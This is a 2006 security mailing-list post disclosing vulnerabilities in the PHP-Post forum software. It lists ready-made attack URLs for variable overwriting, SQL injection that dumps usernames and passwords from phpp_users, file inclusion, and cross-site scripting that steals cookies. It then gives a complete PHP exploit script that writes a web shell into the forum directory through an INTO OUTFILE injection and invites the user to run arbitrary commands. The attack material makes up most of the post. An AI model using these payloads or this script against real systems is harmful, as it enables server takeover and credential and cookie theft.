PHP-Post Multiple Input Validation Vulnerabilities Sep 16 2006 07:11AM
security soqor net
Hello,,

PHP-Post Multiple Input Validation Vulnerabilities

Discovered By : HACKERS PAL

Copy rights : HACKERS PAL

Website : http://www.soqor.net

Email Address : security (at) soqor (dot) net [email concealed]

variables over write,,

this php script is injected with variables over write bug

try to make a new variable with the name of any exist variable and it will over write it :)

example

index.php?table_prefix=myprefix:)

profile.php?table_prefix=myprefix:)%20where%201=1/*

header.php?msgid=w&table_prefix=myprefix:)

Sql

profile.php?user='%20union%20select%20usernumber,7,7,username,7,7,7,7,7,
7,username,7,userpassword,7,7,7,7,7,7,7,7%20from%20phpp_users%20where%20
usernumber=1/*

Include

footer.php?template=22

Xss

pm.php?s=o&replyuser="><script>alert(document.cookie);</script><"

dropdown.php?txt_jumpto="><script>alert(document.cookie);</script><"

template.php?txt_error=<script>alert(document.cookie);</script>

template.php?txt_templatenotexist=<script>alert(document.cookie);</scrip
t>

add split to any link like

editprofile.php?split=<script>alert(document.cookie);</script>

search.php?split=<script>alert(document.cookie);</script>

index.php?split=<script>alert(document.cookie);</script>

pm.php?s=i&split=<script>alert(document.cookie);</script>

all the files are injected

if logged in

loginline.php?txt_logout=<script>alert(document.cookie);</script>

if not

loginline.php?txt_login=<script>alert(document.cookie);</script>

Full path

footer.php?template=22

template.php?template=red&logincookie[user]=ddddd

template.php?template=red

lastvisit.php?

Exploit for sql injection:-

Make phpshell named soqor.php in the forum dir

#!/usr/bin/php -q -d short_open_tag=on

<?

/*

/* PhP-post Sql injection Remote Command execution Exploit

/* By : HACKERS PAL

/* WwW.SoQoR.NeT

*/

print_r('

/***********************************************/

/* PHP-post remote sql injection make phpshell */

/* by HACKERS PAL <security (at) soqor (dot) net [email concealed]> */

/* site: http://www.soqor.net */');

if ($argc<2) {

print_r('

/* -- */

[-] Usage: php '.$argv[0].' host

[-] Example:

[-] php '.$argv[0].' http://localhost/phpp

/***********************************************/

');

die;

}

error_reporting(0);

ini_set("max_execution_time",0);

ini_set("default_socket_timeout",5);

$url=$argv[1];

$exploit1="/footer.php?template=11hack11";

Function get_page($url)

{

if(function_exists("file_get_contents"))

{

$contents = file_get_contents($url);

}

else

{

$fp=fopen("$url","r");

while($line=fread($fp,1024))

{

$contents=$contents.$line;

}

}

return $contents;

}

$page = get_page($url.$exploit1);

$pa=explode("<b>",$page);

$pa=explode("</b>",$pa[2]);

$path = str_replace("footer.php","",$pa[0])."soqor.php";

$var='\ ';

$var = str_replace(" ","",$var);

$path = str_replace($var,"/",$path);

$exploit2="/profile.php?user='%20union%20select%201,'<?php%20','system('
,'".'$_GET[cmd]'."',');','die();','?>',8,9,10,11,12,13,14,15,16,17,18,19
,20,21%20INTO%20OUTFILE%20'$path'%20from%20phpp_users/*";

$page_now = get_page($url.$exploit2);

Echo "\n[+] Go TO $url/soqor.php?cmd=id\n[+] Change id to any command you want :)";

Die("\n/* Visit us : WwW.SoQoR.NeT */\n/***********************************************/");

?>

WwW.SoQoR.NeT

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus